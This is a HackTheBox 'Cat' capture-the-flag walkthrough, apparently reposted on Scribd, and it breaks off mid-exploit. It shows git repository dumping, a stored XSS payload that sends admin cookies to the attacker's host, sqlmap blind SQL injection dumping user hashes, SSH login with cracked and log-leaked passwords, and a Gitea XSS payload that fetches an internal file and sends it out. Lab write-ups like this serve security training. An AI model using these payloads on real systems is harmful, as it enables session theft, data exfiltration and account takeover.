[go: up one dir, main page]
Scribd
Upload
4K views25 pages

HackTheBox Cat

The document details a penetration testing scenario on a Linux machine, where vulnerabilities such as XSS and SQL Injection are exploited to gain access. After scanning the machine and discovering open ports, the attacker finds a Git repository, dumps its contents, and retrieves sensitive information including user and root passwords. The process highlights the use of tools like RustScan and Gobuster for reconnaissance and exploitation.

Uploaded by

自由
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4K views25 pages

HackTheBox Cat

The document details a penetration testing scenario on a Linux machine, where vulnerabilities such as XSS and SQL Injection are exploited to gain access. After scanning the machine and discovering open ports, the attacker finds a Git repository, dumps its contents, and retrieves sensitive information including user and root passwords. The process highlights the use of tools like RustScan and Gobuster for reconnaissance and exploitation.

Uploaded by

自由
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 25

2/2/25, 1:13 PM HackTheBox Cat

HackTheBox Cat
In an average Linux machine from the Vice season, we dump the source code of the application,
find the possibility of XSS and SQL-Injection in it, and get initial access to the system. In the logs,
we find the user password and increase our account. In the end, we use a vulnerability in Gitea —
we spin up LFI via XSS and read an important file, in which we find the password for the root user.

Intelligence
Of course, let's scan the ports using rustscan :

$ rustscan -a 10.129.229.61 -- -sCTV -Pn


.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________

file:///home/core/Downloads/HackTheBox Cat.html 1/25


2/2/25, 1:13 PM HackTheBox Cat

: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size
'-b 1048476'.
Open 10.129.229.61:80
Open 10.129.229.61:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sCTV -Pn" on ip 10.129.229.61
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times
may be slower.
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2025-02-02 07:12 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 07:12
Completed Parallel DNS resolution of 1 host. at 07:12, 3.51s elapsed
DNS resolution of 1 IPs took 3.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0,
TR: 2, CN: 0]
Initiating Connect Scan at 07:12
Scanning 10.129.229.61 [2 ports]
Discovered open port 22/tcp on 10.129.229.61
Discovered open port 80/tcp on 10.129.229.61
Completed Connect Scan at 07:12, 0.09s elapsed (2 total ports)
Initiating Service scan at 07:12
Scanning 2 services on 10.129.229.61
Completed Service scan at 07:12, 6.14s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.229.61.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 3.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.

file:///home/core/Downloads/HackTheBox Cat.html 2/25


2/2/25, 1:13 PM HackTheBox Cat

Initiating NSE at 07:12


Completed NSE at 07:12, 0.00s elapsed
Nmap scan report for 10.129.229.61
Host is up, received user-set (0.068s latency).
Scanned at 2025-02-02 07:12:13 UTC for 11s

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABgQC/7/gBYFf93Ljst5b58XeNKd53hjhC57SgmM9qFvMACECVK0r/Z1
1ho0Z2xy6i9R5dX2G/HAlIfcu6i2QD9lILOnBmSaHZ22HCjjQKzSbbrnlcIcaEZiE011qtkVmtCd2e5zeV
UltA9WCD69pco7BM29OU7FlnMN0iRlF8u962CaRnD4jni/zuiG5C2fcrTHWBxc/RIRELrfJpS3AjJCgEpt
aa7fsH/XfmOHEkNwOL0ZK0/tdbutmcwWf9dDjV6opyg4IK73UNIJSSak0UXHcCpv0GduF3fep3hmjEwkBg
Tg/EeZO1IekGssI7yCr0VxvJVz/Gav+snOZ/A1inA5EMqYHGK07B41+0rZo+EZZNbuxlNw/YLQAGuC5tOH
t896wZ9tnFeqp3CpFdm2rPGUtFW0jogdda1pRmRy5CNQTPDd6kdtdrZYKqHIWfURmzqva7byzQ1YPjhI22
cQ49M79A0yf4yOCPrGlNNzeNJkeZM/LU6p7rNJKxE9CuBAEoyh0=
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmL+UFD1eC5+aMAOZGipV3cuvXzPF
lhqtKj7yVlVwXFN92zXioVTMYVBaivGHf3xmPFInqiVmvsOy3w4TsRja4=
| 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOCpb672fivSz3OLXzut3bkFzO4l6xH57aWuSu4RikE
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.


NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.36 seconds

file:///home/core/Downloads/HackTheBox Cat.html 3/25


2/2/25, 1:13 PM HackTheBox Cat

The ports are typical for HTB Linux machines, so we just add the domain to /etc/hosts :

echo "10.129.229.61 cat.htb" | sudo tee -a /etc/hosts

Let's not forget to look at the webcam cat.htb ​:

Searching for interesting directories via gobuster ​finds us a Git repository on the server:

$ gobuster dir -u http://cat.htb -w /usr/share/wordlists/seclists/Discovery/Web-


Content/quickhits.txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cat.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-
Content/quickhits.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 301) [Size: 301] [--> http://cat.htb/.git/]
/.git/config (Status: 200) [Size: 92]
/.git/HEAD (Status: 200) [Size: 23]
/.git/index (Status: 200) [Size: 1726]

file:///home/core/Downloads/HackTheBox Cat.html 4/25


2/2/25, 1:13 PM HackTheBox Cat

/.git/logs/refs (Status: 301) [Size: 311] [-->


http://cat.htb/.git/logs/refs/]
/.git/logs/HEAD (Status: 200) [Size: 150]
/admin.php (Status: 302) [Size: 1] [--> /join.php]
/config.php (Status: 200) [Size: 1]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

Foot on the ground


Of course, we will dump this repository using git-dumper . Let's install it:

python -m venv env


source env/bin/activate
pip install git-dumper

This is what the dump looks like:

$ git-dumper http://cat.htb/.git cathtb


[-] Testing http://cat.htb/.git/HEAD [200]
[-] Testing http://cat.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://cat.htb/.gitignore [404]
[-] http://cat.htb/.gitignore responded with status code 404
[-] Fetching http://cat.htb/.git/description [200]
[-] Fetching http://cat.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://cat.htb/.git/hooks/post-receive.sample [404]
[-] http://cat.htb/.git/hooks/post-commit.sample responded with status code 404
[-] http://cat.htb/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://cat.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://cat.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://cat.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://cat.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://cat.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://cat.htb/.git/index [200]
[-] Fetching http://cat.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://cat.htb/.git/info/exclude [200]
[-] Fetching http://cat.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://cat.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://cat.htb/.git/objects/info/packs [404]
[-] http://cat.htb/.git/objects/info/packs responded with status code 404
[-] Fetching http://cat.htb/.git/hooks/pre-push.sample [200]
file:///home/core/Downloads/HackTheBox Cat.html 5/25
2/2/25, 1:13 PM HackTheBox Cat

[-] Fetching http://cat.htb/.git/hooks/prepare-commit-msg.sample [200]


[-] Fetching http://cat.htb/.git/hooks/update.sample [200]
[-] Finding refs/
[-] Fetching http://cat.htb/.git/FETCH_HEAD [404]
[-] Fetching http://cat.htb/.git/config [200]
[-] http://cat.htb/.git/FETCH_HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/heads/staging [404]
[-] http://cat.htb/.git/logs/refs/heads/staging responded with status code 404
[-] Fetching http://cat.htb/.git/ORIG_HEAD [404]
[-] http://cat.htb/.git/ORIG_HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://cat.htb/.git/logs/refs/heads/production [404]
[-] Fetching http://cat.htb/.git/logs/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/logs/HEAD [200]
[-] http://cat.htb/.git/logs/refs/heads/main responded with status code 404
[-] http://cat.htb/.git/logs/refs/heads/production responded with status code 404
[-] Fetching http://cat.htb/.git/HEAD [200]
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/master [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/master responded with status code
404
[-] http://cat.htb/.git/logs/refs/remotes/origin/HEAD responded with status code
404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/main [404]
[-] Fetching http://cat.htb/.git/logs/refs/heads/development [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/main responded with status code
404
[-] http://cat.htb/.git/logs/refs/heads/development responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/staging [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/staging responded with status
code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/production [404]
[-] Fetching http://cat.htb/.git/logs/refs/stash [404]
[-] http://cat.htb/.git/logs/refs/stash responded with status code 404
[-] http://cat.htb/.git/logs/refs/remotes/origin/production responded with status
code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/development [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/development responded with status
code 404
[-] Fetching http://cat.htb/.git/packed-refs [404]
[-] http://cat.htb/.git/packed-refs responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/refs/heads/master [200]
[-] http://cat.htb/.git/refs/heads/main responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/heads/staging responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/production [404]

file:///home/core/Downloads/HackTheBox Cat.html 6/25


2/2/25, 1:13 PM HackTheBox Cat

[-] http://cat.htb/.git/refs/heads/production responded with status code 404


[-] Fetching http://cat.htb/.git/refs/heads/development [404]
[-] http://cat.htb/.git/refs/heads/development responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/HEAD [404]
[-] http://cat.htb/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/staging [404]
[-] Fetching http://cat.htb/.git/refs/remotes/origin/master [404]
[-] http://cat.htb/.git/refs/remotes/origin/master responded with status code 404
[-] http://cat.htb/.git/refs/remotes/origin/staging responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/main [404]
[-] http://cat.htb/.git/refs/remotes/origin/main responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/development [404]
[-] Fetching http://cat.htb/.git/refs/remotes/origin/production [404]
[-] http://cat.htb/.git/refs/remotes/origin/production responded with status code
404
[-] http://cat.htb/.git/refs/remotes/origin/development responded with status code
404
[-] Fetching http://cat.htb/.git/refs/stash [404]
[-] http://cat.htb/.git/refs/stash responded with status code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/main [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/main responded with status code
404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/master responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/staging responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/development [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/development responded with
status code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/production [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/main responded with status code
404
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/production responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/development [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/development responded with
status code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/master [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/master responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/production [404]
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/production responded with status
code 404

file:///home/core/Downloads/HackTheBox Cat.html 7/25


2/2/25, 1:13 PM HackTheBox Cat

[-] http://cat.htb/.git/refs/wip/index/refs/heads/staging responded with status


code 404
[-] Fetching http://cat.htb/.git/info/refs [404]
[-] http://cat.htb/.git/info/refs responded with status code 404
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://cat.htb/.git/objects/b8/7b8c6317f8e419dac2c3ce3517a6c93b235028
[200]
[-] Fetching http://cat.htb/.git/objects/88/12266cb97013f416c175f9a9fa08aae524c92a
[200]
[-] Fetching http://cat.htb/.git/objects/56/03bb235ee634e1d7914def967c26f9dd0963bb
[200]
[-] Fetching http://cat.htb/.git/objects/58/62718ef94b524f3e36627e6f2eae1e3570a7f4
[200]
[-] Fetching http://cat.htb/.git/objects/64/d98c5af736de120e17eff23b17e22aad668718
[200]
[-] Fetching http://cat.htb/.git/objects/09/7745b30047ab3d3e6e0c5239c2dfd5cac308a5
[200]
[-] Fetching http://cat.htb/.git/objects/8c/2c2701eb4e3c9a42162cfb7b681b6166287fd5
[200]
[-] Fetching http://cat.htb/.git/objects/31/e87489c5f8160f895e941d00087bea94f21315
[200]
[-] Fetching http://cat.htb/.git/objects/0c/be0133fb00b13165bd7318e42e17f322daac7f
[200]
[-] Fetching http://cat.htb/.git/objects/26/bd62c92bcf4415f2b82514bbbac83936c53cb5
[200]
[-] Fetching http://cat.htb/.git/objects/00/00000000000000000000000000000000000000
[404]
[-] http://cat.htb/.git/objects/00/00000000000000000000000000000000000000
responded with status code 404
[-] Fetching http://cat.htb/.git/objects/9a/dbf70baf0e260d84d9c8666a0460e75e8be4a8
[200]
[-] Fetching http://cat.htb/.git/objects/b7/df8d295f9356332f9619ae5ecec3230a880ef2
[200]
[-] Fetching http://cat.htb/.git/objects/38/660821153b31dbbee89396eacf974c095ab0dc
[200]
[-] Fetching http://cat.htb/.git/objects/91/92afa265e9e73f533227e4f118f882615d3640
[200]
[-] Fetching http://cat.htb/.git/objects/c9/e281ffb3f5431800332021326ba5e97aeb2764
[200]
[-] Fetching http://cat.htb/.git/objects/0f/fa90ae01a4f353aa2f6b2de03c212943412222
[200]
[-] Fetching http://cat.htb/.git/objects/6f/ae98c9ae65a9ecbf37e821e7bafb48bcdac2bc
[200]
[-] Fetching http://cat.htb/.git/objects/cf/8166a8873d413e6afd88fa03305880e795a2c6
[200]

file:///home/core/Downloads/HackTheBox Cat.html 8/25


2/2/25, 1:13 PM HackTheBox Cat

[-] Fetching http://cat.htb/.git/objects/9b/e1a76f22449a7876a712d34dc092f477169c36


[200]
[-] Fetching http://cat.htb/.git/objects/48/21d0cd8fecc8c3579be5735b1aab69f1637c86
[200]
[-] Fetching http://cat.htb/.git/objects/7b/a662bf012ce71d0db9e86c80386b7ae0a54ea1
[200]
[-] Running git checkout .

In the contest.php file we find an XSS opportunity - the username parameter from the session
is not validated and is sent to the database:

And then in the view_cat.php file we get this parameter and give it to the user:

file:///home/core/Downloads/HackTheBox Cat.html 9/25


2/2/25, 1:13 PM HackTheBox Cat

Let's register and send our XSS payload as username :

<img src=x onerror=this.src="http://10.10.16.11:4243/"+btoa(document.cookie)>

file:///home/core/Downloads/HackTheBox Cat.html 10/25


2/2/25, 1:13 PM HackTheBox Cat

Let's launch an HTTP server on our side and send our cat to the competition, attaching any valid
image:

python3 -m http.server 4243

file:///home/core/Downloads/HackTheBox Cat.html 11/25


2/2/25, 1:13 PM HackTheBox Cat

And we catch the administrator cookie (if it doesn’t work, restart the machine or reboot the VPN,
the machine is unstable):

Decode the hook from base64:

file:///home/core/Downloads/HackTheBox Cat.html 12/25


2/2/25, 1:13 PM HackTheBox Cat

$ echo UEhQU0VTU0lEPWpjZThia2VtdDlvNTZ1dDR1Y2lwamJib3Yx | base64 -d


PHPSESSID=jce8bkemt9o56ut4ucipjbbov1

Let's replace our session cookie and see the admin panel:

From the application code we can see that it is SQLite:

file:///home/core/Downloads/HackTheBox Cat.html 13/25


2/2/25, 1:13 PM HackTheBox Cat

And in the file accept_cat.php we will find a SQL injection, which we will use sqlmap on:

We set sqlmap with the required cat ID and its name, as well as with the session cookie, we also
specify the database type and find two blind SQL injections:

file:///home/core/Downloads/HackTheBox Cat.html 14/25


2/2/25, 1:13 PM HackTheBox Cat

$ sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=catty" --


cookie="PHPSESSID=jce8bkemt9o56ut4ucipjbbov1" -p catName --level=5 --risk=3 --
dbms=SQLite
...
---
Parameter: catName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catId=1&catName=catty'||(SELECT CHAR(114,97,83,88) WHERE 5931=5931
AND 1212=1212)||'

Type: time-based blind


Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: catId=1&catName=catty'||(SELECT CHAR(69,77,83,120) WHERE 8467=8467
AND 6442=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
...

Now we dump the table with users via boolean-based blind SQL injection (if you get server errors,
then reduce the number of threads or restart the dump):

sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=catty" --


cookie="PHPSESSID=jce8bkemt9o56ut4ucipjbbov1" -p catName --level=5 --risk=3 --
dbms=SQLite --technique=B -T "users" --threads=4 --dump

file:///home/core/Downloads/HackTheBox Cat.html 15/25


2/2/25, 1:13 PM HackTheBox Cat

Almost the complete dump looks like this, I didn't continue:

+---------+-------------------------------+----------------------------------+----
------+
| user_id | email | password |
username |
+---------+-------------------------------+----------------------------------+----
------+
| 1 | axel2017@gmail.com | d1bbba3670feb9435c9841e46e60ee2f |
axel |
| 2 | rosamendoza485@gmail.com | ac369922d560f17d6eeb8b2c7dec498c |
rosa |
| 3 | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad |
robert |
| 4 | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe |
fabian |
| 5 | jerrysonC343@gmail.com | 781593e060f8d065cd7281c5ec5b4b86 |

file:///home/core/Downloads/HackTheBox Cat.html 16/25


2/2/25, 1:13 PM HackTheBox Cat

jerryson |
| <blank> | larryP5668C????????? | <blank> |
<blank> |
| <blank> | <blank> | <blank> |
<blank> |
| <blank> | <blank> | <blank> |
<blank> |
| <blank> | <blank> | <blank> |
<blank> |
| <blank> | <blank> | <blank> |
<blank> |
| <blank> | <blank> | <blank> |
<blank> |
+---------+-------------------------------+----------------------------------+----
------+

Let's try to send MD5 hashes to crackstation and get the password of user rosa :

Let's try this password for SSH and get inside the system:

sshpass -p'soyunaprincesarosa' ssh -o StrictHostKeyChecking=no rosa@cat.htb

User
Let's look at other users in the system:

$ ls -la /home
total 24
drwxr-xr-x 6 root root 4096 Aug 30 23:19 .
file:///home/core/Downloads/HackTheBox Cat.html 17/25
2/2/25, 1:13 PM HackTheBox Cat

drwxr-xr-x 19 root root 4096 Aug 31 18:28 ..


drwxr-x--- 5 axel axel 4096 Jan 21 12:52 axel
drwxr-x--- 3 git git 4096 Jan 21 12:49 git
drwxr-x--- 6 jobert jobert 4096 Jan 21 12:49 jobert
drwxr-x--- 5 rosa rosa 4096 Jan 21 12:49 rosa

Let's try searching for the nickname axel in Apache2 logs:

$ grep axel /var/log/apache2 -R


...
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:19 +0000] "GET /join.php?
loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1"
302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:30 +0000] "GET /join.php?
loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1"
302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:41 +0000] "GET /join.php?
loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1"
302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:52 +0000] "GET /join.php?
loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1"
302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:30:03 +0000] "GET /join.php?
loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1"
302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:134.0) Gecko/20100101 Firefox/134.0"

Let's reconnect as axel using SSH:

sshpass -p'aNdZwgC4tI9gnVXv_e3Q' ssh -o StrictHostKeyChecking=no axel@cat.htb

User flag

file:///home/core/Downloads/HackTheBox Cat.html 18/25


2/2/25, 1:13 PM HackTheBox Cat

Privilege Escalation
We saw the user git ​, let's try to look at the network connections:

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
Timer
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:40543 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:59173 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:41189 0.0.0.0:* LISTEN
off (0.00/0/0)
tcp 0 0 127.0.0.1:34936 127.0.1.1:80 TIME_WAIT
timewait (38.70/0/0)
tcp 0 0 127.0.0.1:59124 127.0.1.1:80 TIME_WAIT
timewait (6.61/0/0)
tcp 0 0 127.0.0.1:33404 127.0.1.1:80 TIME_WAIT
timewait (28.00/0/0)

file:///home/core/Downloads/HackTheBox Cat.html 19/25


2/2/25, 1:13 PM HackTheBox Cat

tcp 0 1 10.129.153.108:55986 8.8.8.8:53 SYN_SENT on


(1.70/1/0)
tcp 0 0 127.0.0.1:51730 127.0.0.1:40543 ESTABLISHED
off (0.00/0/0)

Ports 25 and 3000 are of interest. And when logging in as axel, we are told that we have mail:

$ cat /var/mail/axel
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care
website and other projects. Please send an email to jobert@localhost with
information about your Gitea repository. Jobert will check if it is a promising
service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can
understand it properly. I will review the whole repository.

From rosa@cat.htb Sat Sep 28 05:05:28 2024


Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector


administrator will be assigned a specific role, while each employee will be able
file:///home/core/Downloads/HackTheBox Cat.html 20/25
2/2/25, 1:13 PM HackTheBox Cat

to consult their assigned tasks. The project is still under development and is
hosted in our private Gitea. You can visit the repository at:
http://localhost:3000/administrator/Employee-management/. In addition, you can
consult the README file, highlighting updates and other important details, at:
http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

Let's direct ports 25 and 3000 to ourselves, while port 25 on the local machine will be available as
2525:

sshpass -p'aNdZwgC4tI9gnVXv_e3Q' ssh -L 3000:127.0.0.1:3000 -L 2525:127.0.0.1:25


axel@cat.htb

We look at port 3000 and find Gitea 1.22.0:

This version of Gitea has Stored XSS - CVE-2024-6886 . And here is an example of the exploit .

We can also log in as axel with his password.

file:///home/core/Downloads/HackTheBox Cat.html 21/25


2/2/25, 1:13 PM HackTheBox Cat

We need to create a repository and write XSS in the Description field. From the email we
remember that we want to extract the admin panel, and we are offered to read the README.md file
, but we will try to target the file http://localhost:3000/administrator/Employee-
management/raw/branch/main/index.php . Let's add the following payload:

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-
management/raw/branch/main/index.php').then(response => response.text()).then(data
=> fetch('http://10.10.16.11:4243/?response=' +
encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS
test</a>

Let's send it to Description when creating a repository, don't forget to note the repository name:

You also need to remember to create any empty file!


file:///home/core/Downloads/HackTheBox Cat.html 22/25
2/2/25, 1:13 PM HackTheBox Cat

Now let's send jobert a link to our repository (I had to send the link many times, and also
remember to double-check that the scheduler didn't destroy our repository):

swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click


link" --body "http://localhost:3000/axel/xss" --server localhost --port 2525 --
timeout 30s
=== Trying localhost:2525...
=== Connected to localhost.
<- 220 cat.htb ESMTP Sendmail 8.15.2/8.15.2/Debian-18; Sun, 2 Feb 2025 08:39:36
GMT; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
-> EHLO vm
<- 250-cat.htb Hello localhost [127.0.0.1], pleased to meet you
<- 250-ENHANCEDSTATUSCODES
<- 250-PIPELINING
<- 250-EXPN
<- 250-VERB
<- 250-8BITMIME
<- 250-SIZE
<- 250-DSN
